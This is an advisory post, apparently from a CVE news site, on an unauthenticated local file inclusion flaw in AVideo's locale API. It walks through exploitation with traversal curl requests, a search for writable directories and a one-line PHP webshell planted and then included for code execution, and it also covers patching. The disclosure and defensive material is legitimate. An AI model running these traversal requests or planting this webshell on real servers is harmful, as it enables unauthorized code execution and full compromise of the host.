AVideo, Unauthenticated Local File Inclusion, CVE (pending) (High)

Listen to this Post

The vulnerability resides in AVideo’s API endpoint APIName=locale, which is exposed without authentication. The file `plugin/API/get.json.php` sets `$global[‘bypassSameDomainCheck’] = 1` and merges GET, POST, and JSON input into a `$parameters` array. The method `get_api_locale()` in `plugin/API/API.php` (lines ~5009–5023) takes the user-controlled locale value and concatenates it directly into a file path without any canonicalization, whitelist, or sanitization. Because the `include` statement accepts directory traversal sequences (../), an attacker can traverse outside the intended locale directory. The included file is then executed as PHP code within the web server context. This leads to local file inclusion of any reachable PHP file under the web root. If an attacker can plant a malicious PHP file (e.g., via writeable directories or other vulnerabilities), the inclusion escalates to remote code execution. The PoC demonstrates that placing a file named `.shell.php` containing `` and requesting the API with `locale=/.shell.php` results in command execution.
Platform: AVideo
Version: Before patch
Vulnerability: Unauthenticated LFI
Severity: High
date: Mar 20, 2026

Prediction: Mar 23, 2026

What Undercode Say:

Verify vulnerable endpoint
curl -k "https://target/plugin/API/get.json.php?APIName=locale&locale=../../../view/about.php"
Confirm inclusion of arbitrary PHP
curl -k "https://target/plugin/API/get.json.php?APIName=locale&locale=/.shell.php?x=id"
Check if writable directory exists (e.g., uploads)
find /var/www/avideo -type d -writable 2>/dev/null
Write test shell if upload vector available
echo '<?php system($_GET["c"]); ?>' > /var/www/avideo/locale/.shell.php

how Exploit:

1. Identify unauthenticated API endpoint `/plugin/API/get.json.php?APIName=locale`.

  1. Supply `locale` parameter with `../` traversal to include a known PHP file (e.g., view/about.php) to confirm LFI.
  2. If a writable directory exists (e.g., `locale/` or uploads), write a PHP webshell.
  3. Trigger inclusion of the planted shell via the same parameter to gain RCE.

Protection from this CVE

Apply the official patch which uses `realpath()` to verify that the resolved path stays within $systemRootPath/locale. Alternatively, restrict the locale value to a strict whitelist and load translation data from JSON/arrays instead of dynamic include. Disable the API endpoint if not required.

Impact:

Unauthenticated attackers can read arbitrary PHP files (source code disclosure) and achieve remote code execution if they can place a PHP file anywhere on the server. Full compromise of the AVideo instance and underlying host is possible.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top